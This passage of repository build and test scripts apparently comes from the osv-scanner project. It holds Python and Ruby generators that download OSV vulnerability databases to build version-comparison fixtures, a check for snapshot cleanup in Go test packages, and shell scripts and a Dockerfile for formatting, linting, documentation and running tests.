{op} {b}' if key in self.cache: return self.cache[key] r = self._compare1(a, op, b) # r = self._compare2(a, op, b) self._save_to_cache(key, r) return r redhat_comparer = RedHatVersionComparer('/tmp/redhat-versions-generator-cache.csv') class RedHatVersion: def __str__(self): return self.version def __hash__(self): return hash(self.version) def __init__(self, version): self.version = version def __lt__(self, other): return redhat_comparer.compare(self.version, '<', other.version) def __gt__(self, other): return redhat_comparer.compare(self.version, '>', other.version) def __eq__(self, other): return redhat_comparer.compare(self.version, '=', other.version) def compare(v1, relate, v2): ops = {'<': operator.lt, '=': operator.eq, '>': operator.gt} return ops[relate](v1, v2) def compare_versions(lines, select='all'): has_any_failed = False for line in lines: line = line.strip() if line == '' or line.startswith('#') or line.startswith('//'): maybe_unsupported = uncomment(line).strip() if is_unsupported_comparison(maybe_unsupported): print(f'\033[96mS\033[0m: \033[93m{maybe_unsupported}\033[0m') continue v1, op, v2 = line.strip().split(' ') r = compare(RedHatVersion(v1), op, RedHatVersion(v2)) if not r: has_any_failed = r if select == 'failures' and r: continue if select == 'successes' and not r: continue color = '\033[92m' if r else '\033[91m' rs = 'T' if r else 'F' print(f'{color}{rs}\033[0m: \033[93m{line}\033[0m') return has_any_failed def compare_versions_in_file(filepath, select='all'): with open(filepath) as f: lines = f.readlines() return compare_versions(lines, select) def generate_version_compares(versions): comparisons = [] for i, version in enumerate(versions): if i == 0: continue comparison = f'{versions[i - 1]} < {version}\n' if is_unsupported_comparison(comparison.strip()): comparison = '# ' + comparison comparisons.append(comparison) return comparisons def generate_package_compares(packages): comparisons = [] for package in packages: versions = packages[package] comparisons.extend(generate_version_compares(versions)) # return comparisons return list(dict.fromkeys(comparisons)) def fetch_packages_versions(): download_redhat_db() osvs = [] with zipfile.ZipFile('redhat-db.zip') as db: for fname in db.namelist(): with db.open(fname) as osv: osvs.append(json.loads(osv.read().decode('utf-8'))) return extract_packages_with_versions(osvs) outfile = 'internal/semantic/testdata/redhat-versions-generated.txt' packs = fetch_packages_versions() with open(outfile, 'w') as f: f.writelines(generate_package_compares(packs)) f.write('\n') # set this to either "failures" or "successes" to only have those comparison results # printed; setting it to anything else will have all comparison results printed show = os.environ.get('VERSION_GENERATOR_PRINT', 'failures') did_any_fail = compare_versions_in_file(outfile, show) if did_any_fail: sys.exit(1) ================================================ FILE: scripts/generators/generate-rubygems-versions.rb ================================================ #!/usr/bin/env ruby require "rubygems/version" require "open-uri" require "json" require "zip" # An array of version comparisons that are known to be unsupported and so # should be commented out in the generated fixture. # # Generally this is because the native implementation has a suspected bug # that causes the comparison to return incorrect results, and so supporting # such comparisons in the detector would in fact be wrong. # # @type [Array] UNSUPPORTED_COMPARISONS = [].freeze # @param [String] line # @return [Boolean] def is_unsupported_comparison?(line) UNSUPPORTED_COMPARISONS.include? line end # @param [String] line # @return [String] def uncomment(line) line.sub(%r{^#|//}, "") end def download_rubygems_db URI.open("https://osv-vulnerabilities.storage.googleapis.com/RubyGems/all.zip") do |zip| File.binwrite("rubygems-db.zip", zip.read) end end def extract_packages_with_versions(osvs) packages = {} osvs.each do |osv| osv["affected"].each do |affected| next unless affected.dig("package", "ecosystem") == "RubyGems" package = affected["package"]["name"] packages[package] ||= [] affected.fetch("versions", []).each do |version| packages[package] << Gem::Version.new(version) end end end packages.transform_values { |v| v.uniq.sort } end def compare_version(v1, op, v2) op = "==" if op == "=" Gem::Version.new(v1).method(op).call(Gem::Version.new(v2)) end # @param [Array] lines # @return [Boolean] def compare_versions(lines, select = :all) has_any_failed = false lines.each do |line| line = line.strip if line.empty? || line.start_with?("#") || line.start_with?("//") maybe_unsupported = uncomment(line).strip puts "\033[96mS\033[0m: \033[93m#{maybe_unsupported}\033[0m" if is_unsupported_comparison?(maybe_unsupported) next end parts = line.split v1 = parts[0] op = parts[1] v2 = parts[2] r = compare_version(v1, op, v2) has_any_failed = true unless r next if select == :failures && r == true next if select == :successes && r != true color = r ? "\033[92m" : "\033[91m" rs = r ? "T" : "F" puts "#{color}#{rs}\033[0m: \033[93m#{line}\033[0m" end has_any_failed end def compare_versions_in_file(filepath, select = :all) compare_versions(File.readlines(filepath), select) end def generate_version_compares(versions) comparisons = [] versions.each_with_index do |version, i| next if i == 0 op = "<" op = "=" if versions[i - 1] == version comparison = "#{versions[i - 1]} #{op} #{version}" comparison = "# #{comparison}" if is_unsupported_comparison?(comparison) comparisons << comparison end comparisons end def generate_package_compares(packages) comparisons = [] packages.each_value { |versions| comparisons.concat(generate_version_compares(versions)) } comparisons end def fetch_packages_versions download_rubygems_db osvs = Zip::File.open("rubygems-db.zip").map { |f| JSON.parse(f.get_input_stream.read) } extract_packages_with_versions(osvs) end outfile = "internal/semantic/testdata/rubygems-versions-generated.txt" packs = fetch_packages_versions File.write(outfile, "#{generate_package_compares(packs).uniq.join("\n")}\n") # set this to either "failures" or "successes" to only have those comparison results # printed; setting it to anything else will have all comparison results printed show = ENV.fetch("VERSION_GENERATOR_PRINT", :failures).to_sym did_any_fail = compare_versions_in_file(outfile, show) exit(1) if did_any_fail ================================================ FILE: scripts/report_uncleaned_snapshots.py ================================================ #!/usr/bin/env python import os import glob def annotate_file(file, msg): if os.getenv('CI') is not None: print(f'::error file={file} msg={msg}') def does_clean_snapshots(pkg_dir): try: with open(f'{pkg_dir}/testmain_test.go', 'r') as file: for _, line in enumerate(file): if ' testutility.CleanSnapshots(m)' in line: return True return False except FileNotFoundError: return False def report_lack_of_snapshot_cleaning(directory): if os.path.exists(f'{directory}/testmain_test.go'): file = f'{directory}/testmain_test.go' annotate_file(file, 'Make sure that `TestMain` is calling `testutility.CleanSnapshots(m)` after the tests have been run') print(f'{file} is not calling `testutility.CleanSnapshots(m)`') else: try: file = list(glob.iglob(os.path.join(directory, '*_test.go')))[0] except IndexError: file = directory annotate_file(file, 'Please add a `testmain_test.go` file with a `TestMain` function that calls `testutility.CleanSnapshots(m)` after the tests have been run') print(f'{directory} does not have a `testmain_test.go` file with a `TestMain` function that calls `testutility.CleanSnapshots(m)` after the tests have been run') pass uncleaned_snapshots = False for snapshot_dir in glob.iglob('**/__snapshots__/', recursive=True): parent_dir = os.path.dirname(snapshot_dir[:-1]) if does_clean_snapshots(parent_dir): continue report_lack_of_snapshot_cleaning(parent_dir) uncleaned_snapshots = True if uncleaned_snapshots: print('') print("one or more packages are using snapshots but not ensuring they're cleaned up") print('make sure these packages have a testmain_test.go file that defines a TestMain function that calls testutility.CleanSnapshots(m)') exit(1) ================================================ FILE: scripts/run_formatters.sh ================================================ #!/usr/bin/env bash set -ex # use write unless we're in CI, since Prettier should always be safe to apply if [ -z "$CI" ]; then npx prettier@latest --write . else npx prettier@latest --check . fi ================================================ FILE: scripts/run_lints.sh ================================================ #!/usr/bin/env bash set -ex export GOTOOLCHAIN="${GOTOOLCHAIN:-go1.26.1}" go run github.com/golangci/golangci-lint/v2/cmd/golangci-lint@$(cat .golangci-lint-version) run ./... "$@" ================================================ FILE: scripts/run_local_docs.sh ================================================ #!/usr/bin/env bash set -ex docker build -t osv-scanner-docs -f ./docs/docs.Dockerfile ./docs docker run -p 4000:4000 osv-scanner-docs ================================================ FILE: scripts/run_tests.sh ================================================ #!/usr/bin/env bash set -e if [ "$TEST_ACCEPTANCE" = true ]; then scripts/build_test_images.sh fi if [ "$DOCKER_TEST" = true ]; then echo "Building test image..." docker build -f scripts/test_env.dockerfile -t osv-scanner-test . echo "Running tests in container..." # Network host is important to fix DNS resolution issues # Docker socket is exposed to access other docker commands for osv-scanner container scanning # alpinegomodcache is a named volume to cache go module downloads between runs # -it allows Ctrl-C commands to cancel a test docker run --rm -it \ --network host \ -v "$(pwd):/src" \ -v "/var/run/docker.sock:/var/run/docker.sock" \ -v "alpinegomodcache:/go/pkg/mod" \ -e TEST_ACCEPTANCE="$TEST_ACCEPTANCE" \ -e UPDATE_SNAPS="$UPDATE_SNAPS" \ -e TEST_VCR_MODE="$TEST_VCR_MODE" \ osv-scanner-test \ sh -c "git config --global --add safe.directory /src && ./scripts/run_tests.sh \"\$@\"" -- "$@" exit $? fi # If running in CI, test with coverage if [ -n "$CI" ]; then go test ./... -coverpkg=./... -coverprofile coverage.out "$@" else # Use gotestsum which has a nicer test output go run gotest.tools/gotestsum@v1.13.0 ./... "$@" fi ================================================ FILE: scripts/test_env.dockerfile ================================================ FROM golang:1.26.1-alpine3.23@sha256:2389ebfa5b7f43eeafbd6be0c3700cc46690ef842ad962f6c5bd6be49ed82039 RUN apk --no-cache add \ npm \ maven \ docker-cli \ git \ build-base \ bash \ rust \ cargo WORKDIR /src